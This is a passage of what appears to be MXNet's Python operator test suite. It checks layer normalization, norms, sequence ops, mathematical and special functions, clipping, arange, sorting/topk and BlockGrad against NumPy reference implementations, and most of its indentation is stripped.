width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32,
forward_check_eps=1E-3, backward_check_eps=1E-3,
npy_grad_check=True, finite_grad_check=True):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
def npy_layer_norm_grad(data, gamma, out_grad, axis, eps):
if axis < 0:
axis += data.ndim
exclude_axis = tuple([ele for ele in range(data.ndim) if ele != axis])
data_mean = data.mean(axis=axis, keepdims=True)
data_var = data.var(axis=axis, keepdims=True)
data_std = np.sqrt(data_var + eps)
centered_data = (data - data_mean) / data_std
gamma_grad = (centered_data * out_grad).sum(axis=exclude_axis, keepdims=True)
beta_grad = out_grad.sum(axis=exclude_axis, keepdims=True)
w = out_grad * gamma.reshape([1 if i != axis else data.shape[axis] for i in range(data.ndim)])\
/ data_std
data_grad = w - w.mean(axis=axis, keepdims=True)\
- centered_data * (w * centered_data).mean(axis=axis, keepdims=True)
gamma_grad = gamma_grad.reshape((-1,))
beta_grad = beta_grad.reshape((-1,))
return data_grad, gamma_grad, beta_grad
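    # Note on the data_grad expression above (explanatory comment only): with
    # w = out_grad * gamma / std and x_hat = (data - mean) / std, the standard
    # layer-norm backward is
    #     dx = w - mean(w) - x_hat * mean(w * x_hat)
    # where the means are taken along the normalized axis.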
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd.asnumpy(), forward_check_eps, forward_check_eps)
if finite_grad_check:
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
if npy_grad_check:
# Test for grad_req = write
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='write')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad =\
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(), gt_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(), gt_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(), gt_beta_grad, backward_check_eps, backward_check_eps)
# Test for grad_req = add
out_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_data_grad = np.random.normal(0, 1, in_shape).astype(dtype)
init_gamma_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
init_beta_grad = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
exe = out_s.simple_bind(ctx, data=in_shape, grad_req='add')
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
exe.grad_dict['data'][:] = init_data_grad
exe.grad_dict['gamma'][:] = init_gamma_grad
exe.grad_dict['beta'][:] = init_beta_grad
exe.forward()
exe.backward([mx.nd.array(out_grad, ctx=ctx)])
gt_data_grad, gt_gamma_grad, gt_beta_grad = \
npy_layer_norm_grad(data, gamma, out_grad, axis, eps)
assert_almost_equal(exe.grad_dict['data'].asnumpy(),
gt_data_grad + init_data_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['gamma'].asnumpy(),
gt_gamma_grad + init_gamma_grad, backward_check_eps, backward_check_eps)
assert_almost_equal(exe.grad_dict['beta'].asnumpy(),
gt_beta_grad + init_beta_grad, backward_check_eps, backward_check_eps)
@with_seed()
def test_norm():
try:
import scipy
        assert LooseVersion(scipy.__version__) >= LooseVersion('1.0')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([2,3,4], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64,
np.int32: np.int32, np.int64: np.int64}
dtype_to_str = {np.float16: 'float16', np.float32: 'float32', np.float64: 'float64',
np.int32: 'int32', np.int64: 'int64'}
is_windows = sys.platform.startswith('win')
for enforce_safe_acc in ["1", "0"]:
if is_windows:
if enforce_safe_acc == "0":
break
enforce_safe_acc = "0" if "MXNET_SAFE_ACCUMULATION" not in os.environ else os.environ["MXNET_SAFE_ACCUMULATION"]
else:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
accumulation_type = acc_type[dtype]
if enforce_safe_acc == "0":
backward_dtype = dtype
out_dtype = dtype_to_str[dtype]
accumulation_type = dtype
skip_backward = 'int' in out_dtype
in_data = np.random.uniform(-1, 1, in_shape).astype(accumulation_type)
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
                        npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
                        npy_out_backward = np.sign(in_data) if order == 1 else in_data / npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=1e-4 if dtype == np.float16 else 1e-5, ctx=ctx, dtype=dtype)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
                            npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
                            npy_out_backward = np.sign(in_data) if order == 1 else in_data / npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
rtol=1e-2 if dtype is np.float16 else 1e-3,
atol=1e-4 if dtype is np.float16 else 1e-5, ctx=ctx)
if dtype is not np.float16 and not skip_backward:
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16 and not skip_backward:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@with_seed()
def test_layer_norm():
for enforce_safe_acc in ["1", "0"]:
os.environ["MXNET_SAFE_ACCUMULATION"] = enforce_safe_acc
for dtype, forward_check_eps, backward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4],
[1E-2, 1E-3, 1E-4]):
if dtype != np.float16:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10), (128 * 32, 512)], [True, True, False]
else:
in_shape_l, finite_grad_check_l = [(10, 6, 5), (10, 10)], [True, True] # large input + fp16 does not pass the forward check
for in_shape, finite_grad_check in zip(in_shape_l, finite_grad_check_l):
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
if dtype == np.float16:
npy_grad_check = False
else:
npy_grad_check = True
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps,
backward_check_eps=backward_check_eps,
npy_grad_check=npy_grad_check,
finite_grad_check=finite_grad_check)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
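# Tiny worked example (not part of the tests): with axis=0 and lengths=[2, 1],
# a batch whose columns are [1, 2, 3] and [4, 5, 6] becomes [2, 1, 3] and
# [4, 5, 6]; only the first `length` steps of each sequence are reversed.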
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
arr_grad1 = arr_grad1.asnumpy()
arr_grad2 = arr_grad2.asnumpy()
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
arr_grad = arr_grad.asnumpy()
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
    except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0].asnumpy(), np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out.asnumpy())
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0].asnumpy(), np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
                    check_symbolic_forward(b, location={'a': a_npy},
                                           expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
                                                             is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0].asnumpy(), a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
    def grad_helper(grad_in, axis, idx):
